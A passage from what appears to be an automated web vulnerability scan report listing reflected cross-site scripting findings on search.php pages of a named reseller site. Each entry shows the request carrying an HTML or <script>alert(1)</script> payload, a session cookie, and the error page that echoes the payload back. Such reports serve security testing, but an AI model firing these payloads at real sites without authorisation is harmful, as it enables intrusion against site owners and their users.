Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9a76f<a>6676715056c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9a76f<a>6676715056c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search9a76f<a>6676715056c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3901. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2aa35<a>b8a693fbccf was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...2aa35<a>b8a693fbccf&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...2aa35<a>b8a693fbccf&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3902. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4978<script>alert(1)</script>a3789f51a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e4978<script>alert(1)</script>a3789f51a42=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e4978<script>alert(1)</script>a3789f51a42=1 was not found on this server.</p>
...[SNIP]...

2.3903. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 94321<a>98745856907 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=294321<a>98745856907 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=294321<a>98745856907 was not found on this server.</p>
...[SNIP]...

2.3904. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abb16<script>alert(1)</script>44759d18353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesaleabb16<script>alert(1)</script>44759d18353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesaleabb16<script>alert(1)</script>44759d18353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3905. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 196e9<script>alert(1)</script>ae18959584a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes196e9<script>alert(1)</script>ae18959584a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes196e9<script>alert(1)</script>ae18959584a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3906. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f7089<script>alert(1)</script>0e140ced661 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosf7089<script>alert(1)</script>0e140ced661/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosf7089<script>alert(1)</script>0e140ced661/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3907. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccdcb<script>alert(1)</script>1250fe83ae8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesccdcb<script>alert(1)</script>1250fe83ae8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesccdcb<script>alert(1)</script>1250fe83ae8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3908. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6d89<script>alert(1)</script>6b32918761c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/search.phpf6d89<script>alert(1)</script>6b32918761c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.phpf6d89<script>alert(1)</script>6b32918761c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3909. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload faab4<a>c23364a6c46 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchfaab4<a>c23364a6c46&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchfaab4<a>c23364a6c46&opt=2 was not found on this server.</p>
...[SNIP]...

2.3910. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 13dfe<a>2d7dde4f7af was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...13dfe<a>2d7dde4f7af&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...13dfe<a>2d7dde4f7af&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3911. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99788<script>alert(1)</script>acc4b3c90bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&99788<script>alert(1)</script>acc4b3c90bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&99788<script>alert(1)</script>acc4b3c90bd=1 was not found on this server.</p>
...[SNIP]...

2.3912. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a81cf<a>ee559f87ea6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a81cf<a>ee559f87ea6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a81cf<a>ee559f87ea6 was not found on this server.</p>
...[SNIP]...

2.3913. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35391<script>alert(1)</script>3ba8e557978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale35391<script>alert(1)</script>3ba8e557978/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale35391<script>alert(1)</script>3ba8e557978/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3914. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35b04<script>alert(1)</script>2021629dc01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes35b04<script>alert(1)</script>2021629dc01/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes35b04<script>alert(1)</script>2021629dc01/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3915. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a570<script>alert(1)</script>35c16b05afe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos1a570<script>alert(1)</script>35c16b05afe/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos1a570<script>alert(1)</script>35c16b05afe/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3916. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4763<script>alert(1)</script>f22048b5af9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/search.phpe4763<script>alert(1)</script>f22048b5af9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.phpe4763<script>alert(1)</script>f22048b5af9?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3917. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fbfcb<a>a0541fccc41 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Searchfbfcb<a>a0541fccc41&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
